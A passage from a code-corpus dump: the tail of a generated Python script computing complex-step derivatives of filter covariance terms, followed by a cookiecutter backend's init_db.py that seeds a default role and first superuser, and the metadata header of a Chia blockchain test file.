p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - 
xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_s*(1.0e-50*1j + theta_n))**2 - 2*p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))**2 + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) + p23_n*p23_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - 
xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamX_N*(ep*u_max*cos(w) + v*cos(theta_s*(1.0e-50*1j + theta_n))/x_s) + lamY_N*v*sin(theta_s*(1.0e-50*1j + theta_n))/y_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - 
xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + 
p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_s*v*(1.0e-50*1j + p23_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - 
yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_s*v*(1.0e-50*1j + p33_n)*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP23_N*(p33_s*v*(1.0e-50*1j + p33_n)*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
tf*0,
])
print(gx)
tock = toc()  # elapsed time for the evaluation above (toc presumably pairs with an earlier tic — TODO confirm)
print('N:' + str(tock))
# Element-wise difference between fx and gx, printed for inspection;
# presumably expected to be ~0 if the two computations agree — verify against caller.
print(fx-gx)
ace09f463b191ee2a7d12b90b6845b2c0cd81773 | 977 | py | Python | {{cookiecutter.project_slug}}/backend/app/app/db/init_db.py | gma2th/full-stack | fd43b13ade62c5dd7acb9d711400c702593984d4 | [
"MIT"
] | 516 | 2018-03-06T19:20:47.000Z | 2022-03-30T22:22:11.000Z | {{cookiecutter.project_slug}}/backend/app/app/db/init_db.py | ohld/full-stack | cc2f9753f268a7e1264dd01b888f587c3a45c9a2 | [
"MIT"
] | 23 | 2018-03-21T19:38:40.000Z | 2020-12-27T23:08:09.000Z | {{cookiecutter.project_slug}}/backend/app/app/db/init_db.py | ohld/full-stack | cc2f9753f268a7e1264dd01b888f587c3a45c9a2 | [
"MIT"
] | 85 | 2018-03-29T16:46:40.000Z | 2022-01-27T18:47:39.000Z | from app.core import config
from app.core.security import pwd_context
from app.db.utils import (
get_role_by_name,
create_role,
get_user_by_username,
create_user,
assign_role_to_user,
)
from app.core.security import get_password_hash
from app.models.user import User
from app.models.role import Role
def init_db(db_session):
    """Seed the database with the "default" role and the first superuser.

    Idempotent: an existing role or user record is reused rather than
    recreated, and the role is (re)assigned to the superuser either way.

    Tables are expected to be created via Alembic migrations. To create them
    directly instead, uncomment:
    # Base.metadata.create_all(bind=engine)
    """
    default_role = get_role_by_name("default", db_session)
    if not default_role:
        default_role = create_role("default", db_session)

    superuser = get_user_by_username(config.FIRST_SUPERUSER, db_session)
    if not superuser:
        superuser = create_user(
            db_session,
            config.FIRST_SUPERUSER,
            config.FIRST_SUPERUSER_PASSWORD,
            is_superuser=True,
        )

    assign_role_to_user(default_role, superuser, db_session)
| 27.138889 | 67 | 0.702149 |
ace09f67c1ff8f6a43a0a8653641043bd3520dfd | 40,440 | py | Python | tests/blockchain/test_blockchain_transactions.py | Albertjan90/chia-blockchain | 24b4533e7dd225c065c234eeaea25f06118a088b | [
"Apache-2.0"
] | 16 | 2021-07-07T08:21:28.000Z | 2022-02-09T04:28:42.000Z | tests/blockchain/test_blockchain_transactions.py | Albertjan90/chia-blockchain | 24b4533e7dd225c065c234eeaea25f06118a088b | [
"Apache-2.0"
] | null | null | null | tests/blockchain/test_blockchain_transactions.py | Albertjan90/chia-blockchain | 24b4533e7dd225c065c234eeaea25f06118a088b | [
"Apache-2.0"
